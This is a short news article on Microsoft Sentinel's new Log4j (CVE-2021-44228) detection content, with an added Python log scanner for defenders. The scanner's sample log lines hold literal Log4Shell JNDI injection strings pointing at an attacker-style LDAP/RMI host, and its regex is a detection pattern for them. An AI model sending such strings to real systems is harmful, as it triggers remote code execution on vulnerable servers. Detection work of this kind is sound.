Microsoft Azure Sentinel can now detect Apache Log4j vulnerabilities

Microsoft Azure Sentinel is Microsoft’s native Security Information and Event Management (SIEM) tool built within Azure. Azure Sentinel enables SecOps teams to see and stop threats before they cause harm to the organization. Azure Sentinel is powered by AI to reduce noise, and Microsoft claims that you can see an overall reduction of up to 90 percent in alert fatigue.

Microsoft’s security research teams have been tracking threats taking advantage of the remote code execution (RCE) vulnerability in Apache Log4j 2, referred to as “Log4Shell” and tracked as CVE-2021-44228. The vulnerability allows unauthenticated remote code execution and is triggered when a specially crafted string, supplied by the attacker through any of a variety of input vectors, is parsed and processed by the vulnerable Log4j 2 component.

The company has now announced that a new Microsoft Sentinel solution has been added to the Content Hub, providing content to monitor, detect and investigate signals related to exploitation of the recently disclosed Log4j vulnerability.
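As an added illustration of the kind of detection the solution above is meant to provide (example code written for this page, not Microsoft's Sentinel content or its queries), the following Python scans web-server access-log lines for the Log4j 2 lookup string across several request fields, URL-decoding each field first because the string may arrive encoded. The log lines, IP addresses and field names are constructed assumptions.

```python
import re
from urllib.parse import unquote

# Log4j 2 JNDI lookup string with the schemes reported in CVE-2021-44228 activity.
# Case-insensitive because Log4j resolves the lookup regardless of case.
JNDI_LOOKUP = re.compile(r"\$\{jndi:(ldap|rmi|dns|iiop|corba|nds|http)s?:", re.IGNORECASE)

# Combined access-log format: ip - - [time] "request" status size "referer" "user-agent"
ACCESS_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed sample lines (TEST-NET addresses), not real traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Dec/2021:13:02:11 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.8 - - [10/Dec/2021:13:02:12 +0000] "GET /login HTTP/1.1" 200 341 "-" "${jndi:ldap://203.0.113.5:1389/a}"',
    '203.0.113.9 - - [10/Dec/2021:13:02:13 +0000] "GET /?q=%24%7Bjndi%3Armi%3A%2F%2F203.0.113.5%2Fx HTTP/1.1" 404 0 "-" "curl/7.79"',
]


def decode(value: str) -> str:
    # Decode twice so a double-URL-encoded value is inspected in its final form.
    return unquote(unquote(value))


def scan_line(line: str):
    """Return a list of findings for one log line, or None if nothing matched."""
    m = ACCESS_LINE.match(line)
    if not m:
        return None  # unparseable line; a real pipeline would count these separately
    findings = []
    # Each field is a distinct input vector that the application may have logged.
    for field in ("request", "referer", "ua"):
        hit = JNDI_LOOKUP.search(decode(m.group(field)))
        if hit:
            findings.append({"vector": field, "scheme": hit.group(1).lower(), "src": m.group("ip")})
    return findings or None


def scan_log(lines):
    """Flatten findings across all lines so they can be fed to an alerting step."""
    return [f for line in lines for f in (scan_line(line) or [])]


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```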

For technical and mitigation information about the vulnerability, please read:

Guidance for preventing, detecting, and hunting for CVE-2021-44228 Log4j 2 exploitation.

via RedMondMag